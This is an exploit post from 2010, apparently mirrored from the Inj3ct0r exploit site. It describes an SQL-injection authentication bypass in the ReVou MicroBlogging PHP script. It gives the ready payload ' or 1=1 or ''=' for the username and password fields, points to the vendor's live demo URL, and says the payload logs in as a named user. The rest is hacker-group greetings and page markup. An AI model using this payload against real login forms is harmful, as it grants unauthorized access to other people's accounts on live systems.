Home / os / win7

ReVou MicroBlogging Script Auth Bypass Vulnerabilty

Posted on 06 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ReVou MicroBlogging Script Auth Bypass Vulnerabilty </title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================
ReVou MicroBlogging Script Auth Bypass Vulnerabilty 
===================================================


Name : ReVou MicroBlogging Script Auth Bypass Vulnerabilty
Date : july 6,2010
Critical Level :VERY HIGH
vendor URL :http://www.revou.com/demo
Price:free

Author : ..::[ SONiC ]::.. aka ~the_pshyco~ &lt;sonicdefence[at]gmail.com&gt;

special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,Bunny,Nishi,MA1201,RJ,D3aD F0x

greetz to :www.topsecure.net ,All ICW members , iNj3cT0r.com, www.andhrahackers.com

special Shoutz : my Girl Frnd [H*****]

#######################################################################################################
Description :


Micro Blogging is a revolutionary PHP software that allows you to start your Twitter clone site. ReVou offers you the next generation social networking and mobile blogging solution for your users bringing more viral growth for your site.


#######################################################################################################
Xploit :SQl i vulnerabilty

DEMO URL http://www.revou.com/demo

Use
' or 1=1 or ''=' in both username and password field lets you to login as ALEXz




###############################################################################################################

# ..::[ SONiC ]::.. aka the_pshyco
# profile http://inj3ct0r.com/author/2545


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :